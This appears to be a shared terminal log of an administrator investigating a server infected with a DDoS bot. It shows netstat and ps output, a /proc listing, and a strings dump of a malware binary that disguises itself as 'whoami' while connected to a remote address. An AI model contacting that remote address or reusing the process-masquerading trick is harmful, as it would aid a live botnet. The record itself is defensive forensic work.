Last active
August 29, 2015 14:22
-
-
Save dotmanila/231090878ed02cc4e870 to your computer and use it in GitHub Desktop.
DDoS Script Found
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[root@acme ~]# netstat -plant | |
Active Internet connections (servers and established) | |
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | |
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1270/sshd | |
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2043/master | |
tcp 0 0 192.254.64.50:50611 103.240.141.54:3505 ESTABLISHED 722/whoami | |
tcp 0 268 192.254.64.50:22 122.2.123.122:54675 ESTABLISHED 15580/sshd: revin [ | |
tcp6 0 0 :::22 :::* LISTEN 1270/sshd | |
tcp6 0 0 ::1:25 :::* LISTEN 2043/master | |
[root@acme ~]# w | |
11:15:25 up 1:11, 2 users, load average: 0.00, 0.01, 0.05 | |
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | |
revin tty1 10:04 48:37 0.40s 0.07s login -- revin | |
revin pts/0 122.2.123.122 11:13 5.00s 0.02s 0.01s sshd: revin [priv] | |
[root@acme ~]# ps auxf | |
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND | |
root 2 0.0 0.0 0 0 ? S 10:03 0:00 [kthreadd] | |
root 3 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/0] | |
root 5 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/0:0H] | |
root 8 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/0] | |
root 9 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcu_bh] | |
root 10 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/0] | |
root 11 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/1] | |
root 12 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/2] | |
root 13 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/3] | |
root 14 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/4] | |
root 15 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/5] | |
root 16 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/6] | |
root 17 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/7] | |
root 18 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/8] | |
root 19 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/9] | |
root 20 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/10] | |
root 21 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/11] | |
root 22 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/12] | |
root 23 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/13] | |
root 24 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/14] | |
root 25 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/15] | |
root 26 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/16] | |
root 27 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/17] | |
root 28 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/18] | |
root 29 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/19] | |
root 30 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/20] | |
root 31 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/21] | |
root 32 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/22] | |
root 33 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuob/23] | |
root 34 0.0 0.0 0 0 ? S 10:03 0:02 \_ [rcu_sched] | |
root 35 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/0] | |
root 36 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/1] | |
root 37 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/2] | |
root 38 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/3] | |
root 39 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/4] | |
root 40 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/5] | |
root 41 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/6] | |
root 42 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/7] | |
root 43 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/8] | |
root 44 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/9] | |
root 45 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/10] | |
root 46 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/11] | |
root 47 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/12] | |
root 48 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/13] | |
root 49 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/14] | |
root 50 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/15] | |
root 51 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/16] | |
root 52 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/17] | |
root 53 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/18] | |
root 54 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/19] | |
root 55 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/20] | |
root 56 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/21] | |
root 57 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/22] | |
root 58 0.0 0.0 0 0 ? S 10:03 0:00 \_ [rcuos/23] | |
root 59 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/0] | |
root 60 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/1] | |
root 61 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/1] | |
root 62 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/1] | |
root 64 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/1:0H] | |
root 65 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/2] | |
root 66 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/2] | |
root 67 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/2] | |
root 69 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/2:0H] | |
root 70 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/3] | |
root 71 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/3] | |
root 72 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/3] | |
root 74 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/3:0H] | |
root 75 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/4] | |
root 76 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/4] | |
root 77 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/4] | |
root 79 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/4:0H] | |
root 80 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/u50:0] | |
root 81 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/5] | |
root 82 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/5] | |
root 83 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/5] | |
root 85 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/5:0H] | |
root 86 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/6] | |
root 87 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/6] | |
root 88 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/6] | |
root 89 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/6:0] | |
root 90 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/6:0H] | |
root 91 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/7] | |
root 92 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/7] | |
root 93 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/7] | |
root 95 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/7:0H] | |
root 96 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/8] | |
root 97 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/8] | |
root 98 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/8] | |
root 100 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/8:0H] | |
root 101 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/9] | |
root 102 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/9] | |
root 103 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/9] | |
root 105 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/9:0H] | |
root 106 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/10] | |
root 107 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/10] | |
root 108 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/10] | |
root 109 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/10:0] | |
root 110 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/10:0H] | |
root 111 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/11] | |
root 112 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/11] | |
root 113 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/11] | |
root 115 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/11:0H] | |
root 116 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/12] | |
root 117 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/12] | |
root 118 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/12] | |
root 119 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/12:0] | |
root 120 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/12:0H] | |
root 121 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/13] | |
root 122 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/13] | |
root 123 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/13] | |
root 125 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/13:0H] | |
root 126 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/14] | |
root 127 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/14] | |
root 128 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/14] | |
root 129 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/14:0] | |
root 130 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/14:0H] | |
root 131 0.0 0.0 0 0 ? S 10:03 0:00 \_ [watchdog/15] | |
root 132 0.0 0.0 0 0 ? S 10:03 0:03 \_ [migration/15] | |
root 133 0.0 0.0 0 0 ? S 10:03 0:00 \_ [ksoftirqd/15] | |
root 134 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/15:0] | |
root 135 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/15:0H] | |
root 136 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [khelper] | |
root 137 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kdevtmpfs] | |
root 138 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [netns] | |
root 139 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [writeback] | |
root 140 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kintegrityd] | |
root 141 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [bioset] | |
root 142 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kblockd] | |
root 143 0.0 0.0 0 0 ? S 10:03 0:00 \_ [khubd] | |
root 144 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [md] | |
root 147 0.0 0.0 0 0 ? S 10:03 0:00 \_ [khungtaskd] | |
root 148 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kswapd0] | |
root 149 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kswapd1] | |
root 150 0.0 0.0 0 0 ? SN 10:03 0:00 \_ [ksmd] | |
root 151 0.0 0.0 0 0 ? SN 10:03 0:00 \_ [khugepaged] | |
root 152 0.0 0.0 0 0 ? S 10:03 0:00 \_ [fsnotify_mark] | |
root 153 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [crypto] | |
root 162 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kthrotld] | |
root 163 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/u48:1] | |
root 166 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kmpath_rdacd] | |
root 168 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/1:1] | |
root 171 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/3:1] | |
root 172 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/8:1] | |
root 174 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/7:1] | |
root 175 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/10:1] | |
root 177 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/11:1] | |
root 179 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/2:2] | |
root 180 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/12:1] | |
root 181 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/14:1] | |
root 183 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kpsmoused] | |
root 203 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [deferwq] | |
root 225 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kauditd] | |
root 377 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [ata_sff] | |
root 387 0.0 0.0 0 0 ? S 10:03 0:00 \_ [scsi_eh_0] | |
root 388 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [scsi_tmf_0] | |
root 389 0.0 0.0 0 0 ? S 10:03 0:00 \_ [scsi_eh_1] | |
root 390 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [scsi_tmf_1] | |
root 391 0.0 0.0 0 0 ? S 10:03 0:00 \_ [scsi_eh_2] | |
root 392 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [scsi_tmf_2] | |
root 393 0.0 0.0 0 0 ? S 10:03 0:00 \_ [scsi_eh_3] | |
root 394 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [scsi_tmf_3] | |
root 395 0.0 0.0 0 0 ? S 10:03 0:00 \_ [scsi_eh_4] | |
root 396 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [scsi_tmf_4] | |
root 397 0.0 0.0 0 0 ? S 10:03 0:00 \_ [scsi_eh_5] | |
root 398 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [scsi_tmf_5] | |
root 401 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/u49:4] | |
root 402 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/u49:5] | |
root 404 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [ttm_swap] | |
root 410 0.0 0.0 0 0 ? S 10:03 0:00 \_ [scsi_eh_6] | |
root 411 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [scsi_tmf_6] | |
root 423 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/6:2] | |
root 429 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/15:2] | |
root 435 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [xfsalloc] | |
root 436 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [xfs_mru_cache] | |
root 437 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [xfs-buf/sda4] | |
root 438 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [xfs-data/sda4] | |
root 439 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [xfs-conv/sda4] | |
root 440 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [xfs-cil/sda4] | |
root 441 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/14:1H] | |
root 442 0.1 0.0 0 0 ? S 10:03 0:05 \_ [xfsaild/sda4] | |
root 443 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/7:1H] | |
root 448 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/0:1H] | |
root 460 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/11:2] | |
root 498 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/4:1H] | |
root 499 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/5:1H] | |
root 500 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/6:1H] | |
root 509 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/12:1H] | |
root 513 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/13:1H] | |
root 520 0.0 0.0 0 0 ? S< 10:03 0:00 \_ [kworker/15:1H] | |
root 529 0.0 0.0 0 0 ? S 10:03 0:00 \_ [kworker/8:2] | |
root 590 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [edac-poller] | |
root 612 0.0 0.0 0 0 ? SN 10:04 0:00 \_ [kipmi0] | |
root 646 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [kvm-irqfd-clean] | |
root 652 0.0 0.0 0 0 ? S 10:04 0:00 \_ [kworker/u50:1] | |
root 655 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-buf/sda2] | |
root 656 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-data/sda2] | |
root 657 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-conv/sda2] | |
root 658 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-cil/sda2] | |
root 659 0.0 0.0 0 0 ? S 10:04 0:00 \_ [xfsaild/sda2] | |
root 661 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-buf/sda3] | |
root 662 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-data/sda3] | |
root 663 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-conv/sda3] | |
root 664 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [xfs-cil/sda3] | |
root 665 0.0 0.0 0 0 ? S 10:04 0:00 \_ [xfsaild/sda3] | |
root 1308 0.0 0.0 0 0 ? S 10:04 0:00 \_ [kworker/1:2] | |
root 1316 0.0 0.0 0 0 ? S 10:04 0:00 \_ [kworker/13:2] | |
root 2732 0.0 0.0 0 0 ? S< 10:04 0:00 \_ [kworker/8:1H] | |
root 2779 0.0 0.0 0 0 ? S< 10:05 0:00 \_ [kworker/2:1H] | |
root 3059 0.0 0.0 0 0 ? S< 10:06 0:00 \_ [kworker/1:1H] | |
root 4222 0.0 0.0 0 0 ? S 10:12 0:00 \_ [kworker/0:0] | |
root 6348 0.0 0.0 0 0 ? S 10:24 0:00 \_ [kworker/13:0] | |
root 6920 0.0 0.0 0 0 ? S 10:27 0:00 \_ [kworker/7:2] | |
root 8041 0.0 0.0 0 0 ? S 10:33 0:00 \_ [kworker/5:2] | |
root 9715 0.0 0.0 0 0 ? S 10:42 0:00 \_ [kworker/u48:2] | |
root 10939 0.0 0.0 0 0 ? S< 10:48 0:00 \_ [kworker/3:1H] | |
root 11392 0.0 0.0 0 0 ? S 10:51 0:00 \_ [kworker/9:0] | |
root 12326 0.0 0.0 0 0 ? S 10:56 0:00 \_ [kworker/4:1] | |
root 13066 0.0 0.0 0 0 ? S 11:00 0:00 \_ [kworker/2:1] | |
root 13285 0.0 0.0 0 0 ? S 11:01 0:00 \_ [kworker/3:0] | |
root 13392 0.0 0.0 0 0 ? S 11:01 0:00 \_ [kworker/4:0] | |
root 13633 0.0 0.0 0 0 ? S 11:02 0:00 \_ [kworker/0:2] | |
root 13666 0.0 0.0 0 0 ? S 11:03 0:00 \_ [kworker/5:1] | |
root 14223 0.0 0.0 0 0 ? S 11:06 0:00 \_ [kworker/9:2] | |
root 15368 0.0 0.0 0 0 ? S 11:12 0:00 \_ [kworker/4:2] | |
root 15666 0.0 0.0 0 0 ? S 11:13 0:00 \_ [kworker/1:0] | |
root 15950 0.0 0.0 0 0 ? S 11:15 0:00 \_ [kworker/9:1] | |
root 1 0.0 0.0 54344 4076 ? Ss 10:03 0:03 /usr/lib/systemd/systemd --switched-root --system --deserialize 24 | |
root 521 0.0 0.0 43016 5352 ? Ss 10:03 0:00 /usr/lib/systemd/systemd-journald | |
root 538 0.0 0.0 104492 1032 ? Ss 10:03 0:00 /usr/sbin/lvmetad -f | |
root 548 0.0 0.0 42396 1808 ? Ss 10:03 0:00 /usr/lib/systemd/systemd-udevd | |
root 680 0.0 0.0 51148 1612 ? S<sl 10:04 0:00 /sbin/auditd -n | |
root 702 0.0 0.0 329608 23144 ? Ssl 10:04 0:00 /usr/bin/python -Es /usr/sbin/firewalld --nofork --nopid | |
root 705 0.0 0.0 208012 3336 ? Ssl 10:04 0:00 /usr/sbin/rsyslogd -n | |
avahi 706 0.0 0.0 28068 1668 ? Ss 10:04 0:00 avahi-daemon: running [acme.local] | |
avahi 716 0.0 0.0 27944 448 ? S 10:04 0:00 \_ avahi-daemon: chroot helper | |
root 707 0.0 0.0 550148 18124 ? Ssl 10:04 0:00 /usr/bin/python -Es /usr/sbin/tuned -l -P | |
root 709 0.0 0.0 19272 1236 ? Ss 10:04 0:00 /usr/sbin/irqbalance --foreground | |
root 711 0.0 0.0 34684 1780 ? Ss 10:04 0:00 /usr/lib/systemd/systemd-logind | |
dbus 713 0.0 0.0 26704 1804 ? Ss 10:04 0:00 /bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation | |
chrony 714 0.0 0.0 26792 1480 ? S 10:04 0:00 /usr/sbin/chronyd -u chrony | |
root 722 0.1 0.0 25424 288 ? Ssl 10:04 0:05 whoami | |
root 853 0.0 0.0 516276 8220 ? Ssl 10:04 0:00 /usr/sbin/NetworkManager --no-daemon | |
polkitd 921 0.0 0.0 514364 10240 ? Ssl 10:04 0:00 /usr/lib/polkit-1/polkitd --no-debug | |
root 1270 0.0 0.0 82488 3592 ? Ss 10:04 0:00 /usr/sbin/sshd -D | |
root 15580 0.0 0.0 135196 4840 ? Ss 11:13 0:00 \_ sshd: revin [priv] | |
revin 15582 0.0 0.0 135196 2064 ? S 11:13 0:00 \_ sshd: revin@pts/0 | |
revin 15583 0.0 0.0 115348 1992 pts/0 Ss 11:13 0:00 \_ -bash | |
root 15697 0.0 0.0 188720 2664 pts/0 S 11:13 0:00 \_ sudo su - | |
root 15698 0.0 0.0 180064 2156 pts/0 S 11:13 0:00 \_ su - | |
root 15699 0.0 0.0 115348 2036 pts/0 S 11:13 0:00 \_ -bash | |
root 16088 0.0 0.0 123752 1716 pts/0 R+ 11:15 0:00 \_ ps auxf | |
root 1282 0.0 0.0 126304 1572 ? Ss 10:04 0:00 /usr/sbin/crond -n | |
root 1284 0.0 0.0 25932 944 ? Ss 10:04 0:00 /usr/sbin/atd -f | |
root 1486 0.0 0.0 87140 2536 ? Ss 10:04 0:00 login -- revin | |
revin 2718 0.0 0.0 115348 1984 tty1 Ss 10:04 0:00 \_ -bash | |
root 2758 0.0 0.0 188720 2668 tty1 S 10:05 0:00 \_ sudo su - | |
root 2759 0.0 0.0 180060 2152 tty1 S 10:05 0:00 \_ su - | |
root 2760 0.0 0.0 115352 2088 tty1 S+ 10:05 0:00 \_ -bash | |
root 2043 0.0 0.0 91064 2092 ? Ss 10:04 0:00 /usr/libexec/postfix/master -w | |
postfix 2077 0.0 0.0 91168 3896 ? S 10:04 0:00 \_ pickup -l -t unix -u | |
postfix 2078 0.0 0.0 91236 3920 ? S 10:04 0:00 \_ qmgr -l -t unix -u | |
root 16080 0.0 0.0 1456 836 ? Ss 11:15 0:00 id | |
root 16084 0.0 0.0 1456 832 ? Ss 11:15 0:00 ls -la | |
root 16085 0.0 0.0 1456 836 ? Ss 11:15 0:00 su | |
root 16086 0.0 0.0 1456 836 ? Ss 11:15 0:00 grep "A" | |
root 16087 0.0 0.0 1456 840 ? Ss 11:15 0:00 id | |
[root@acme ~]# ps auxf|grep 722 | |
root 722 0.1 0.0 25424 288 ? Ssl 10:04 0:05 whoami | |
root 16135 0.0 0.0 112640 960 pts/0 S+ 11:16 0:00 \_ grep --color=auto 722 | |
[root@acme ~]# ls -alh /proc/722/ | |
total 0 | |
dr-xr-xr-x 8 root root 0 Jun 1 10:04 . | |
dr-xr-xr-x 278 root root 0 Jun 1 10:03 .. | |
dr-xr-xr-x 2 root root 0 Jun 1 11:15 attr | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 autogroup | |
-r-------- 1 root root 0 Jun 1 11:16 auxv | |
-r--r--r-- 1 root root 0 Jun 1 11:16 cgroup | |
--w------- 1 root root 0 Jun 1 11:16 clear_refs | |
-r--r--r-- 1 root root 0 Jun 1 11:15 cmdline | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 comm | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 coredump_filter | |
-r--r--r-- 1 root root 0 Jun 1 11:16 cpuset | |
lrwxrwxrwx 1 root root 0 Jun 1 11:16 cwd -> / | |
-r-------- 1 root root 0 Jun 1 11:16 environ | |
lrwxrwxrwx 1 root root 0 Jun 1 10:04 exe -> /usr/bin/gctjxueidd | |
dr-x------ 2 root root 0 Jun 1 11:15 fd | |
dr-x------ 2 root root 0 Jun 1 11:16 fdinfo | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 gid_map | |
-r-------- 1 root root 0 Jun 1 11:16 io | |
-r--r--r-- 1 root root 0 Jun 1 11:16 limits | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 loginuid | |
-r--r--r-- 1 root root 0 Jun 1 11:16 maps | |
-rw------- 1 root root 0 Jun 1 11:16 mem | |
-r--r--r-- 1 root root 0 Jun 1 11:16 mountinfo | |
-r--r--r-- 1 root root 0 Jun 1 11:16 mounts | |
-r-------- 1 root root 0 Jun 1 11:16 mountstats | |
dr-xr-xr-x 5 root root 0 Jun 1 11:16 net | |
dr-x--x--x 2 root root 0 Jun 1 11:16 ns | |
-r--r--r-- 1 root root 0 Jun 1 11:16 numa_maps | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 oom_adj | |
-r--r--r-- 1 root root 0 Jun 1 11:16 oom_score | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 oom_score_adj | |
-r--r--r-- 1 root root 0 Jun 1 11:16 pagemap | |
-r--r--r-- 1 root root 0 Jun 1 11:16 personality | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 projid_map | |
lrwxrwxrwx 1 root root 0 Jun 1 11:16 root -> / | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 sched | |
-r--r--r-- 1 root root 0 Jun 1 11:16 sessionid | |
-r--r--r-- 1 root root 0 Jun 1 11:16 smaps | |
-r--r--r-- 1 root root 0 Jun 1 11:16 stack | |
-r--r--r-- 1 root root 0 Jun 1 11:15 stat | |
-r--r--r-- 1 root root 0 Jun 1 11:16 statm | |
-r--r--r-- 1 root root 0 Jun 1 11:15 status | |
-r--r--r-- 1 root root 0 Jun 1 11:16 syscall | |
dr-xr-xr-x 6 root root 0 Jun 1 11:16 task | |
-rw-r--r-- 1 root root 0 Jun 1 11:16 uid_map | |
-r--r--r-- 1 root root 0 Jun 1 11:16 wchan | |
[root@acme ~]# file /usr/bin/gctjxueidd | |
/usr/bin/gctjxueidd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped | |
[root@acme ~]# ps auxf|grep 722 | |
root 722 0.1 0.0 25424 288 ? Ssl 10:04 0:05 whoami | |
root 16440 0.0 0.0 112640 960 pts/0 S+ 11:17 0:00 \_ grep --color=auto 722 | |
[root@acme ~]# strings /usr/bin/gctjxueidd | |
PTRhpP | |
</t4 | |
</ud | |
0[^] | |
<*u. | |
<:uk | |
/tmpf | |
< uZ | |
<:um | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
@d@u | |
@d@u | |
[^_] | |
[^_] | |
PPPe | |
@d@uM | |
Ad@u | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
u:;{ | |
Su'e | |
WVSU | |
][^_ | |
WVSU | |
][^_ | |
@u*9 | |
WVSU | |
@uD9 | |
][^_ | |
[^_] | |
[^_] | |
[^_] | |
< wF | |
,[^_] | |
[^_] | |
[^_] | |
4$e3 | |
[^_] | |
gfff | |
gfff | |
[^_] | |
[^_] | |
D[^_] | |
0< v | |
vcf | |
X[^_] | |
X[^_] | |
0< v | |
[^_] | |
[^_] | |
[^_] | |
t!:G | |
,[^_] | |
[^_] | |
ti9E | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
;N tv | |
0[^_] | |
0[^_] | |
[^_] | |
G +G | |
u8+} | |
CL~, | |
@9GLs; | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
| 9M | |
[^_] | |
[^_] | |
[^_] | |
<at% | |
[^_] | |
0<_t5<-t1<.t-<,f | |
t'<:t#</ | |
<+tb<b | |
<mt`<x | |
tS;E | |
O +O | |
[^_] | |
[^_] | |
[^_] | |
t )A | |
([^_] | |
SH9z | |
[^_] | |
([^_] | |
[^_] | |
VH9Z | |
